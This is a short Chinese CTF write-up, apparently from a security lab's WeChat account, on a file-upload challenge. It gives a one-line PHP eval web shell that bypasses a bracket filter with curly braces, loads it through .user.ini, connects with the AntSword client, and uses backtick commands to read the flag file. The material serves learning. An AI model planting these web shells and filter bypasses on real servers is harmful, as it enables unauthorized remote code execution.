所以需要将吗的长度缩短的同时进行过滤，在上个题尝试了几个段标签的过滤之后继续尝试

在尝试的过程中发现了它过滤了[]，所以我们用{}来进行绕过。

<? eval($_POST{'156'});?>

尝试一下和前两个题一样使用.user.ini包含一下看看能不能执行。

发现可以执行，然后用蚁剑进行连接便可以找到flag

在做这个题的时候也看了不少别人的wp，受到了一些启发

当我们在这种情况下用webshell写入一个php文件进去测试时；文件是被写入成功的，但其中内容为空。

但我们可以通过蚁剑来直接编写这个文件

我们也可以直接从bp中修改命令，然后反复上传达到目的

这里面原来的文件会被替换掉

同时我们也可以使用反引号来执行命令，因为这个题过滤了system()等，因为我直接用蚁剑连接进行了绕过，所以具体过滤了啥我也不是很清楚。。。

<?=`tac ../f*`?>
<?=`tac ../flag.?hp`?>

最后访问url/upload/index.php即可

原文始发于微信公众号（山警网络空间安全实验室）：皮蛋厂的学习日记 | 2022.4.24 有关 *CTF ezRSA一点思考&文件上传漏洞